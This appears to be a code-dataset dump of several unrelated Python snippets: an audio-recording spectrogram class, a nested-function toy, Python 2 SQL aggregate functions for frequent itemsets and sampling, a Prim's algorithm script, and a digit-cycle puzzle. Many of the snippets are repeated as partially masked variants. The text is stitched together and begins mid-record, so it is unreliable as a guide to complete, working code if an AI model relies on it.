- Output, MME (0 in, 2 out)\n# < 1 扬声器 (Realtek High Definition, MME (0 in, 2 out)\n# 2 主声音驱动程序, Windows DirectSound (0 in, 2 out)\n# 3 扬声器 (Realtek High Definition Audio), Windows DirectSound (0 in, 2 out)\n# 4 扬声器 (Realtek High Definition Audio), Windows WASAPI (0 in, 2 out)\n# 5 Speakers (Realtek HD Audio output), Windows WDM-KS (0 in, 6 out)\n# 6 立体声混音 (Realtek HD Audio Stereo input), Windows WDM-KS (2 in, 0 out)\n# 7 线路输入 (Realtek HD Audio Line input), Windows WDM-KS (2 in, 0 out)\n# 8 FrontMic (Realtek HD Audio Front Mic input), Windows WDM-KS (2 in, 0 out)\n# 9 麦克风 (Realtek HD Audio Mic input), Windows WDM-KS (2 in, 0 out)\n\n# fs = 44100 # Hz\n# length = 5 # s\n# recording = sd.rec(frames=fs * length, samplerate=fs, blocking=True, channels=1)\nclass SpectrumMap2:\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period),\n samplerate=self.framerate, blocking=True, channels=self.nchannels, dtype='int16')\n return recording.reshape((recording.size, ))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n # crop = image.crop((81, 59, 575, 426))\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: 
bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n\n data = io.BytesIO()\n # y = abs(np.fft.fft(y) * self.nchannels)\n y = y[:len(y)//2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count//2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n # crop = image.crop((81, 59, 575, 426))\n crop = image\n return crop\n\n # @staticmethod\n # def blend(sp1, sp2, ndata):\n # im1 = sp1.map(ndata, clear=True)\n # im2 = sp2.raw(ndata, clear=False)\n # res = Image.blend(im1, im2, 0.5)\n # return res\n\n def fetch(self, period: float):\n ndata = self.record(period)\n # im1 = self.map(ndata, clear=True)\n im2 = self.raw(ndata, clear=True)\n # res = Image.blend(im1, im2, 0.5)\n res = im2\n return res\n\n\nclass Sound:\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-ids": [
12,
14,
16,
18,
19
]
}
|
[
12,
14,
16,
18,
19
] |
def foo(x, y=5):
def bar(x):
return x + 1
return bar(y * 2)
print(foo(3))
|
normal
|
{
"blob_id": "80d1979c5767d0ff90f464651c9d0ca6d65effb2",
"index": 6472,
"step-1": "<mask token>\n",
"step-2": "def foo(x, y=5):\n\n def bar(x):\n return x + 1\n return bar(y * 2)\n\n\n<mask token>\n",
"step-3": "def foo(x, y=5):\n\n def bar(x):\n return x + 1\n return bar(y * 2)\n\n\nprint(foo(3))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import re
import itertools
import setpath
import functions
import lib.jopts as jopts
from operator import itemgetter
import random
__docformat__ = 'reStructuredText en'
re_params=re.compile('(\w*):(.*)')
def consumer(func):
"""A decorator, advances func to its first yield point when called.
"""
from functools import wraps
@wraps(func)
def wrapper(*args,**kw):
gen = func(*args, **kw)
gen.next()
return gen
return wrapper
class freqitemsets:
"""
.. function:: freqitemsets(datacol, [threshold, noautothres, stats, maxlen]) -> [itemset_id:int, itemset_length:int, itemset_frequency:int, item:text]
Calculates frequent itemsets on a given column (datacol). The algorithm is tuned for the
case when we have many different items (in the order of millions), many input itemsets, but
small itemset length (10-20).
Returned table schema:
:itemset_id: Automatic itemset id
:itemset_length: Length of itemset
:itemset_frequency: How many times an itemset has been found
:item: Itemset's item value
Parameters:
:datacol:
Column on which to calculate frequent itemsets
:threshold: Default is 2
How many times an freq. itemset must appear for it to appear in the results
:noautothres: 1/0 (Default is 0)
Do not calculate the threshold automatically
:stats: 1/0 (Default is 0)
Return frequent itemset statistics
:maxlen: NUMBER (Default is no limit at all)
Maximum itemset length to search
Examples:
>>> table1('''
... 'car wood bike' 'first group'
... 'car car wood' 'first group'
... 'car wood' 'first group'
... 'car wood ice' 'first group'
... 'ice' 'second group'
... 'car ice' 'second group'
... 'car cream toy' 'second group'
... 'icecream ice car toy' 'second group'
... ''')
>>> sql("select b,freqitemsets(a, 'threshold:2', 'noautothres:1', 'maxlen:2') from table1 group by b")
b | itemset_id | itemset_length | itemset_frequency | item
---------------------------------------------------------------------
first group | 1 | 1 | 4 | wood
first group | 2 | 1 | 4 | car
first group | 3 | 2 | 4 | car
first group | 3 | 2 | 4 | wood
second group | 1 | 1 | 3 | ice
second group | 2 | 1 | 3 | car
second group | 3 | 1 | 2 | toy
second group | 4 | 2 | 2 | car
second group | 4 | 2 | 2 | ice
second group | 5 | 2 | 2 | car
second group | 5 | 2 | 2 | toy
>>> sql("select b,freqitemsets(a, 'stats:1') from table1 group by b")
b | MaxTransactionLength | CombinationCount | PassedTransactions | ValidKeywords
-------------------------------------------------------------------------------------------
first group | 3 | 2 | 3 | 2
first group | 3 | 1 | 1 | 2
first group | 3 | 0 | 0 | 0
second group | 4 | 3 | 3 | 3
second group | 4 | 0 | 3 | 0
"""
registered=True
multiset=True
def __init__(self):
self.threshold=2
self.startingthreshold=2
self.autothres=1
self.compress=0
self.initstatic=False
self.input={}
self.maxlength=0
self.kwcode={}
self.codekw={}
self.maxkwcode=0
self.overthres={}
self.belowthres={}
self.passedkw={}
self.init=True
self.itemset_id=0
self.maxlen=None
self.stats=False
def initargs(self, args):
self.init=False
for i in xrange(1, len(args)):
v=re_params.match(args[i])
if v is not None and v.groups()[0]!='' and v.groups()[1]!='' and i>0:
v=v.groups()
if v[0]=='threshold':
try:
self.threshold=int(v[1])
self.startingthreshold=self.threshold
except KeyboardInterrupt:
raise
except:
raise functions.OperatorError("FreqItemsets",'No integer value given for threshold')
if v[0]=='noautothres':
self.autothres=0
if v[0]=='compress':
self.compress=1
if v[0]=='maxlen':
self.maxlen=int(v[1])
if v[0]=='stats':
self.stats=True
def demultiplex(self, data):
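        # Expand a row that contains one iterable field into multiple rows, one per element.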
iterable=None
iterpos=-1
for i in xrange(len(data)):
if hasattr(data[i],'__iter__')==True:
iterable=data[i]
iterpos=i
break
if iterpos==-1:
yield list(data)
else:
pre=list(data[0:iterpos])
post=list(data[iterpos+1:])
for i in iterable:
if hasattr(i,'__iter__')==False:
yield pre+[i]+post
else:
yield pre+list(i)+post
def insertcombfreq(self, comb, freq):
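        # Count an occurrence of 'comb'; once it reaches the threshold, promote it to the frequent set.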
if comb in self.overthres:
self.overthres[comb]+=freq
else:
if comb in self.belowthres:
self.belowthres[comb]+=freq
else:
self.belowthres[comb]=freq
if self.belowthres[comb]>=self.threshold:
self.overthres[comb]=self.belowthres[comb]
del(self.belowthres[comb])
for k in comb:
if self.compress==0:
self.passedkw[k]=True
elif not k in self.passedkw:
self.passedkw[k]=self.overthres[comb]
else:
self.passedkw[k]+=self.overthres[comb]
def insertitemset(self, itemset):
if itemset not in self.input:
self.input[itemset]=1
else:
self.input[itemset]+=1
def cleanitemsets(self, minlength):
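        # Keep only items that are still frequent and drop transactions that became too short.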
newitemsets={}
for k,v in self.input.iteritems():
itemset=tuple(i for i in k if i in self.passedkw)
if self.compress==1:
esoteric_itemset=tuple(i for i in itemset if self.passedkw[i]==v)
if len(esoteric_itemset)>0:
if len(itemset)>=minlength:
self.overthres[itemset]=v
itemset=tuple(i for i in itemset if self.passedkw[i]!=v)
if len(itemset)>=minlength:
if itemset not in newitemsets:
newitemsets[itemset]=v
else:
newitemsets[itemset]+=v
self.input=newitemsets
def step(self, *args):
if self.init==True:
self.initargs(args)
if len(args[0])==0:
return
itms=sorted(set(args[0].split(' ')))
itms=[x for x in itms if x!='']
li=len(itms)
if li>0:
if li>self.maxlength:
self.maxlength=li
inputkws=[]
for kw in itms:
if len(kw)==0:
print itms, args[0], len(args[0]), li
if kw not in self.kwcode:
self.kwcode[kw]=self.maxkwcode
self.codekw[self.maxkwcode]=kw
inputkws.append(self.maxkwcode)
self.insertcombfreq( (self.maxkwcode,),1 )
self.maxkwcode+=1
else:
itm=self.kwcode[kw]
self.insertcombfreq( (itm,),1 )
inputkws.append(itm)
if len(inputkws)>1:
self.insertitemset(tuple(inputkws))
def final(self):
if not self.stats:
yield ('itemset_id', 'itemset_length', 'itemset_frequency', 'item')
else:
yield ('MaxTransactionLength', 'CombinationCount', 'PassedTransactions', 'ValidKeywords')
splist=[{},{}]
del(self.kwcode)
splist[1]=self.overthres
if self.stats:
yield [self.maxlength, len(splist[1]), len(self.input), len(self.passedkw)]
if not self.stats:
for its,v in sorted(splist[1].items(), key=itemgetter(1),reverse=True):
self.itemset_id+=1
for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):
yield i
if self.maxlen==None:
self.maxlen=self.maxlength
for l in xrange(2, min(self.maxlength+1, self.maxlen+1)):
splist.append({})
self.belowthres={}
self.overthres={}
prevl=l-1
# Autothresholding
if self.autothres==1:
if len(self.input)==0 or len(self.passedkw)==0:
break
else:
self.threshold=self.startingthreshold + int(len(self.passedkw)/len(self.input))
self.cleanitemsets(l)
self.passedkw={}
prevsplist = splist[prevl]
icombs = itertools.combinations
insertcomb = self.insertcombfreq
for k,v in self.input.iteritems():
for k in icombs(k,l):
insertit=True
for i1 in icombs(k, prevl):
if i1 not in prevsplist:
insertit=False
break
if insertit:
insertcomb( k,v )
splist[l-1]={}
splist[l]=self.overthres
if self.stats:
yield [self.maxlength, len(splist[l]), len(self.input), len(self.passedkw)]
if not self.stats:
for its,v in sorted(splist[l].items(), key=itemgetter(1),reverse=True):
self.itemset_id+=1
for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):
yield i
del(self.overthres)
del(self.belowthres)
del(self.passedkw)
del(self.input)
del(self.codekw)
del(splist)
class sampledistvals:
"""
.. function:: sampledistvals(sample_size, C1, C2, C3) -> [C1, C2, C3]
Sampledistvals returns sample_size distinct values for each of the input C1..Cn columns.
>>> table1('''
... test1 2 3
... test1 2 3
... test2 4 2
... test4 2 t
... ''')
>>> sql("select sampledistvals(3, a, b, c) from table1")
C1 | C2 | C3
---------------------------------------------
["test1","test2","test4"] | [2,4] | [2,3,"t"]
"""
registered=True
def __init__(self):
self.vals=None
self.lenargs = -1
self.init=True
def step(self, *args):
if self.init:
self.lenargs = len(args)
            self.vals = [set() for i in xrange(self.lenargs-1)]
self.init = False
for i in xrange(1, self.lenargs):
if len(self.vals[i-1])<args[0] and args[i] not in self.vals[i-1]:
self.vals[i-1].add(args[i])
def final(self):
yield tuple(['C'+str(i) for i in xrange(1, self.lenargs)] )
yield [jopts.toj(list(i)) for i in self.vals]
class sample:
"""
.. function:: sample(sample_size, C1, C2, C3)
Sample returns a random sample_size set of rows.
>>> table1('''
... test1 2 3
... test1 2 3
... test2 4 2
... test4 2 t
... ''')
>>> sql("select sample(2, a, b, c) from table1") # doctest: +ELLIPSIS
C1 | C2 | C3
---------------
...
"""
registered=True
def __init__(self):
self.samplelist = []
self.index = 0
def step(self, *args):
sample_count = args[0]
# Generate the reservoir
if self.index < sample_count:
self.samplelist.append(args[1:])
else:
r = random.randint(0, self.index)
if r < sample_count:
self.samplelist[r] = args[1:]
self.index += 1
def final(self):
        if len(self.samplelist) == 0:
yield tuple(['C1'])
else:
yield tuple(['C'+str(i) for i in xrange(1, len(self.samplelist[0]) + 1)] )
for r in self.samplelist:
yield list(r)
if not ('.' in __name__):
"""
This is needed to be able to test the function, put it at the end of every
new function you create
"""
import sys
import setpath
from functions import *
testfunction()
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('utf-8')
import doctest
doctest.testmod()
|
normal
|
{
"blob_id": "60411e922bfec8f98028f959a370f954eef5437e",
"index": 1329,
"step-1": "import re\nimport itertools\nimport setpath\nimport functions\nimport lib.jopts as jopts\nfrom operator import itemgetter\nimport random\n\n__docformat__ = 'reStructuredText en'\n\nre_params=re.compile('(\\w*):(.*)')\n\ndef consumer(func):\n \"\"\"A decorator, advances func to its first yield point when called.\n \"\"\"\n\n from functools import wraps\n\n @wraps(func)\n def wrapper(*args,**kw):\n gen = func(*args, **kw)\n gen.next()\n return gen\n return wrapper\n\n\nclass freqitemsets:\n \"\"\"\n .. function:: freqitemsets(datacol, [threshold, noautothres, stats, maxlen]) -> [itemset_id:int, itemset_length:int, itemset_frequency:int, item:text]\n\n Calculates frequent itemsets on a given column (datacol). The algorithm is tuned for the\n case when we have many different items (in the order of millions), many input itemsets, but\n small itemset length (10-20).\n\n Returned table schema:\n\n :itemset_id: Automatic itemset id\n :itemset_length: Length of itemset\n :itemset_frequency: How many times an itemset has been found\n :item: Itemset's item value\n\n Parameters:\n\n :datacol:\n\n Column on which to calculate frequent itemsets\n\n :threshold: Default is 2\n\n How many times an freq. itemset must appear for it to appear in the results\n\n :noautothres: 1/0 (Default is 0)\n\n Do not calculate the threshold automatically\n\n :stats: 1/0 (Default is 0)\n\n Return frequent itemset statistics\n\n :maxlen: NUMBER (Default is no limit at all)\n\n Maximum itemset length to search\n\n Examples:\n \n >>> table1('''\n ... 'car wood bike' 'first group'\n ... 'car car wood' 'first group'\n ... 'car wood' 'first group'\n ... 'car wood ice' 'first group'\n ... 'ice' 'second group'\n ... 'car ice' 'second group'\n ... 'car cream toy' 'second group'\n ... 'icecream ice car toy' 'second group'\n ... 
''')\n >>> sql(\"select b,freqitemsets(a, 'threshold:2', 'noautothres:1', 'maxlen:2') from table1 group by b\")\n b | itemset_id | itemset_length | itemset_frequency | item\n ---------------------------------------------------------------------\n first group | 1 | 1 | 4 | wood\n first group | 2 | 1 | 4 | car\n first group | 3 | 2 | 4 | car\n first group | 3 | 2 | 4 | wood\n second group | 1 | 1 | 3 | ice\n second group | 2 | 1 | 3 | car\n second group | 3 | 1 | 2 | toy\n second group | 4 | 2 | 2 | car\n second group | 4 | 2 | 2 | ice\n second group | 5 | 2 | 2 | car\n second group | 5 | 2 | 2 | toy\n\n >>> sql(\"select b,freqitemsets(a, 'stats:1') from table1 group by b\")\n b | MaxTransactionLength | CombinationCount | PassedTransactions | ValidKeywords\n -------------------------------------------------------------------------------------------\n first group | 3 | 2 | 3 | 2\n first group | 3 | 1 | 1 | 2\n first group | 3 | 0 | 0 | 0\n second group | 4 | 3 | 3 | 3\n second group | 4 | 0 | 3 | 0\n \"\"\"\n\n\n registered=True\n multiset=True\n\n def __init__(self):\n self.threshold=2\n self.startingthreshold=2\n self.autothres=1\n self.compress=0\n self.initstatic=False\n self.input={}\n self.maxlength=0\n self.kwcode={}\n self.codekw={}\n self.maxkwcode=0\n self.overthres={}\n self.belowthres={}\n self.passedkw={}\n self.init=True\n self.itemset_id=0\n self.maxlen=None\n self.stats=False\n\n def initargs(self, args):\n self.init=False\n for i in xrange(1, len(args)):\n v=re_params.match(args[i])\n if v is not None and v.groups()[0]!='' and v.groups()[1]!='' and i>0:\n v=v.groups()\n if v[0]=='threshold':\n try:\n self.threshold=int(v[1])\n self.startingthreshold=self.threshold\n except KeyboardInterrupt:\n raise \n except:\n raise functions.OperatorError(\"FreqItemsets\",'No integer value given for threshold')\n if v[0]=='noautothres':\n self.autothres=0\n if v[0]=='compress':\n self.compress=1\n if v[0]=='maxlen':\n self.maxlen=int(v[1])\n if v[0]=='stats':\n self.stats=True\n\n def demultiplex(self, data):\n iterable=None\n iterpos=-1\n\n for i in xrange(len(data)):\n if hasattr(data[i],'__iter__')==True:\n iterable=data[i]\n iterpos=i\n break\n\n if iterpos==-1:\n yield list(data)\n else:\n pre=list(data[0:iterpos])\n post=list(data[iterpos+1:])\n for i in iterable:\n if hasattr(i,'__iter__')==False:\n yield pre+[i]+post\n else:\n yield pre+list(i)+post\n \n def insertcombfreq(self, comb, freq):\n if comb in self.overthres:\n self.overthres[comb]+=freq\n else:\n if comb in self.belowthres:\n self.belowthres[comb]+=freq\n else:\n self.belowthres[comb]=freq\n\n if self.belowthres[comb]>=self.threshold:\n self.overthres[comb]=self.belowthres[comb]\n del(self.belowthres[comb])\n for k in comb:\n if self.compress==0:\n self.passedkw[k]=True\n elif not k in self.passedkw:\n self.passedkw[k]=self.overthres[comb]\n else:\n self.passedkw[k]+=self.overthres[comb]\n\n def insertitemset(self, itemset):\n if itemset not in self.input:\n self.input[itemset]=1\n else:\n self.input[itemset]+=1\n\n def cleanitemsets(self, minlength):\n newitemsets={}\n for k,v in self.input.iteritems():\n itemset=tuple(i for i in k if i in self.passedkw)\n if self.compress==1:\n esoteric_itemset=tuple(i for i in itemset if self.passedkw[i]==v)\n if len(esoteric_itemset)>0:\n if len(itemset)>=minlength:\n self.overthres[itemset]=v\n itemset=tuple(i for i in itemset if self.passedkw[i]!=v)\n if len(itemset)>=minlength:\n if itemset not in newitemsets:\n newitemsets[itemset]=v\n else:\n newitemsets[itemset]+=v\n\n 
self.input=newitemsets\n\n def step(self, *args):\n if self.init==True:\n self.initargs(args)\n\n if len(args[0])==0:\n return\n \n itms=sorted(set(args[0].split(' ')))\n itms=[x for x in itms if x!='']\n li=len(itms)\n if li>0:\n if li>self.maxlength:\n self.maxlength=li\n\n inputkws=[]\n for kw in itms:\n if len(kw)==0:\n print itms, args[0], len(args[0]), li\n if kw not in self.kwcode:\n self.kwcode[kw]=self.maxkwcode\n self.codekw[self.maxkwcode]=kw\n inputkws.append(self.maxkwcode)\n self.insertcombfreq( (self.maxkwcode,),1 )\n self.maxkwcode+=1\n else:\n itm=self.kwcode[kw]\n self.insertcombfreq( (itm,),1 )\n inputkws.append(itm)\n\n if len(inputkws)>1:\n self.insertitemset(tuple(inputkws))\n\n def final(self):\n if not self.stats:\n yield ('itemset_id', 'itemset_length', 'itemset_frequency', 'item')\n else:\n yield ('MaxTransactionLength', 'CombinationCount', 'PassedTransactions', 'ValidKeywords')\n\n splist=[{},{}]\n del(self.kwcode)\n splist[1]=self.overthres\n\n if self.stats:\n yield [self.maxlength, len(splist[1]), len(self.input), len(self.passedkw)]\n\n if not self.stats:\n for its,v in sorted(splist[1].items(), key=itemgetter(1),reverse=True):\n self.itemset_id+=1\n for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):\n yield i\n\n if self.maxlen==None:\n self.maxlen=self.maxlength\n for l in xrange(2, min(self.maxlength+1, self.maxlen+1)):\n splist.append({})\n self.belowthres={}\n self.overthres={}\n prevl=l-1\n\n # Autothresholding\n if self.autothres==1:\n if len(self.input)==0 or len(self.passedkw)==0:\n break\n else:\n self.threshold=self.startingthreshold + int(len(self.passedkw)/len(self.input))\n\n self.cleanitemsets(l)\n self.passedkw={}\n prevsplist = splist[prevl]\n icombs = itertools.combinations\n insertcomb = self.insertcombfreq\n\n for k,v in self.input.iteritems():\n for k in icombs(k,l):\n insertit=True\n for i1 in icombs(k, prevl):\n if i1 not in prevsplist:\n insertit=False\n break\n\n if insertit:\n insertcomb( k,v )\n\n splist[l-1]={}\n splist[l]=self.overthres\n\n if self.stats:\n yield [self.maxlength, len(splist[l]), len(self.input), len(self.passedkw)]\n\n if not self.stats:\n for its,v in sorted(splist[l].items(), key=itemgetter(1),reverse=True):\n self.itemset_id+=1\n for i in self.demultiplex( (self.itemset_id, len([self.codekw[i] for i in its]), v, [self.codekw[i] for i in its]) ):\n yield i\n\n del(self.overthres)\n del(self.belowthres)\n del(self.passedkw)\n del(self.input)\n del(self.codekw)\n del(splist)\n\nclass sampledistvals:\n \"\"\"\n\n .. function:: sampledistvals(sample_size, C1, C2, C3) -> [C1, C2, C3]\n\n Sampledistvals returns sample_size distinct values for each of the input C1..Cn columns.\n\n >>> table1('''\n ... test1 2 3\n ... test1 2 3\n ... test2 4 2\n ... test4 2 t\n ... 
''')\n >>> sql(\"select sampledistvals(3, a, b, c) from table1\")\n C1 | C2 | C3\n ---------------------------------------------\n [\"test1\",\"test2\",\"test4\"] | [2,4] | [2,3,\"t\"]\n \"\"\"\n registered=True\n\n def __init__(self):\n self.vals=None\n self.lenargs = -1\n self.init=True\n\n def step(self, *args):\n if self.init:\n self.lenargs = len(args)\n self.vals = a=[set() for i in xrange(self.lenargs-1)]\n self.init = False\n\n for i in xrange(1, self.lenargs):\n if len(self.vals[i-1])<args[0] and args[i] not in self.vals[i-1]:\n self.vals[i-1].add(args[i])\n\n def final(self):\n yield tuple(['C'+str(i) for i in xrange(1, self.lenargs)] )\n yield [jopts.toj(list(i)) for i in self.vals]\n\nclass sample:\n \"\"\"\n\n .. function:: sample(sample_size, C1, C2, C3)\n\n Sample returns a random sample_size set of rows.\n\n >>> table1('''\n ... test1 2 3\n ... test1 2 3\n ... test2 4 2\n ... test4 2 t\n ... ''')\n\n >>> sql(\"select sample(2, a, b, c) from table1\") # doctest: +ELLIPSIS\n C1 | C2 | C3\n ---------------\n ...\n \"\"\"\n registered=True\n\n def __init__(self):\n self.samplelist = []\n self.index = 0\n\n def step(self, *args):\n sample_count = args[0]\n\n # Generate the reservoir\n if self.index < sample_count:\n self.samplelist.append(args[1:])\n else:\n r = random.randint(0, self.index)\n if r < sample_count:\n self.samplelist[r] = args[1:]\n\n self.index += 1\n\n\n def final(self):\n if len(self.samplelist) == []:\n yield tuple(['C1'])\n else:\n yield tuple(['C'+str(i) for i in xrange(1, len(self.samplelist[0]) + 1)] )\n for r in self.samplelist:\n yield list(r)\n\nif not ('.' in __name__):\n \"\"\"\n This is needed to be able to test the function, put it at the end of every\n new function you create\n \"\"\"\n import sys\n import setpath\n from functions import *\n testfunction()\n if __name__ == \"__main__\":\n reload(sys)\n sys.setdefaultencoding('utf-8')\n import doctest\n doctest.testmod()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import sys
def ReadFile(array, fileName):
with open(fileName, 'r') as f:
if f.readline().rstrip() != 'MS':
print("prosze podac macierz sasiedztwa")
for i in f:
el = list(map(int, i.rstrip().split()))
if len(el) > 1:
array.append(el)
def Prim(matrix, vertex_to_start):
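    # Prim's MST over an adjacency matrix; 100000 stands in for infinity and 0 means no edge.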
heap_map = [100000 for i in range(len(matrix))]
heap_map[vertex_to_start] = 0
length = len(matrix)
    # predecessor array
p = [0 for i in range(len(matrix))]
    # list of already-finished vertices
ready_vertices = []
    # current index on which operations are performed
index = vertex_to_start
while len(ready_vertices) != length:
for i in range(len(matrix[index])):
            # check that the vertex is not already finished and
            # that there is an edge between the vertices
if i not in ready_vertices and matrix[index][i] != 0:
                # if the new connection to this vertex through some edge
                # is better (shorter), replace its predecessor
if matrix[index][i] < heap_map[i]:
heap_map[i] = matrix[index][i]
p[i] = index
        # add the vertex to the finished set
ready_vertices.append(index)
        # artificially remove it from heap_map
heap_map[index] = 100000
        # choose a new index - the minimal one
index = heap_map.index(min(heap_map))
    # starting vertex
p[vertex_to_start] = 'x'
print(p)
def main():
if len(sys.argv) < 2:
print("prosze podac plik")
sys.exit()
fileName = sys.argv[1]
matrix = []
ReadFile(matrix, fileName)
#print(matrix[1].index(min(matrix[0])))
Prim(matrix, 0)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "56b8b9884b8500ff70f59058484c4a351b709311",
"index": 3517,
"step-1": "<mask token>\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print('prosze podac macierz sasiedztwa')\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [(100000) for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n length = len(matrix)\n p = [(0) for i in range(len(matrix))]\n ready_vertices = []\n index = vertex_to_start\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n if i not in ready_vertices and matrix[index][i] != 0:\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n ready_vertices.append(index)\n heap_map[index] = 100000\n index = heap_map.index(min(heap_map))\n p[vertex_to_start] = 'x'\n print(p)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print('prosze podac macierz sasiedztwa')\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [(100000) for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n length = len(matrix)\n p = [(0) for i in range(len(matrix))]\n ready_vertices = []\n index = vertex_to_start\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n if i not in ready_vertices and matrix[index][i] != 0:\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n ready_vertices.append(index)\n heap_map[index] = 100000\n index = heap_map.index(min(heap_map))\n p[vertex_to_start] = 'x'\n print(p)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\n\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print('prosze podac macierz sasiedztwa')\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [(100000) for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n length = len(matrix)\n p = [(0) for i in range(len(matrix))]\n ready_vertices = []\n index = vertex_to_start\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n if i not in ready_vertices and matrix[index][i] != 0:\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n ready_vertices.append(index)\n heap_map[index] = 100000\n index = heap_map.index(min(heap_map))\n p[vertex_to_start] = 'x'\n print(p)\n\n\ndef main():\n if len(sys.argv) < 2:\n print('prosze podac plik')\n sys.exit()\n fileName = sys.argv[1]\n matrix = []\n ReadFile(matrix, fileName)\n Prim(matrix, 0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\n\ndef ReadFile(array, fileName):\n with open(fileName, 'r') as f:\n if f.readline().rstrip() != 'MS':\n print(\"prosze podac macierz sasiedztwa\")\n for i in f:\n el = list(map(int, i.rstrip().split()))\n if len(el) > 1:\n array.append(el)\n\n\ndef Prim(matrix, vertex_to_start):\n heap_map = [100000 for i in range(len(matrix))]\n heap_map[vertex_to_start] = 0\n\n length = len(matrix)\n\n # tablica poprzednikow\n p = [0 for i in range(len(matrix))]\n\n # tablica gotowych wierzcholkow\n ready_vertices = []\n\n # obecny index na ktorym wykonywane sa operacje\n index = vertex_to_start\n\n while len(ready_vertices) != length:\n for i in range(len(matrix[index])):\n # sprawdzam czy wierzcholek juz nie jest gotowy i\n # czy jest polaczenie miedzy wierzcholkami\n if i not in ready_vertices and matrix[index][i] != 0:\n # jezeli nowe polaczenie miedzy danym wierzcholkiem i\n # jakas krawedzia lepsze(krotsze) to zamieniam poprzednika\n if matrix[index][i] < heap_map[i]:\n heap_map[i] = matrix[index][i]\n p[i] = index\n # dodaje wierzcholek do gotowych\n ready_vertices.append(index)\n # sztucznie usuwam z heap_map\n heap_map[index] = 100000\n # wybieram nowy indeks - minimalny\n index = heap_map.index(min(heap_map))\n\n # wierzcholek poczatkowy\n p[vertex_to_start] = 'x' \n\n print(p)\n\n\n\n\ndef main():\n if len(sys.argv) < 2:\n print(\"prosze podac plik\")\n sys.exit()\n \n fileName = sys.argv[1]\n matrix = []\n \n ReadFile(matrix, fileName)\n\n #print(matrix[1].index(min(matrix[0])))\n Prim(matrix, 0)\n\n\n\n\nif __name__ == \"__main__\":\n main()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
N = int(input())
StopPoint = N
cycle = 0
ten = 0
one = 0
new_N = 0
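# Repeat the digit game (new number = last digit * 10 + last digit of the digit sum) until N returns to its starting value, counting the cycle length.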
while True:
ten = N // 10
one = N % 10
total = ten + one
new_N = one * 10 + total % 10
cycle += 1
N = new_N
if new_N == StopPoint:
break
print(cycle)
|
normal
|
{
"blob_id": "047b3b25cb064115a46cde1f1480ce55a1256bc1",
"index": 5827,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n ten = N // 10\n one = N % 10\n total = ten + one\n new_N = one * 10 + total % 10\n cycle += 1\n N = new_N\n if new_N == StopPoint:\n break\nprint(cycle)\n",
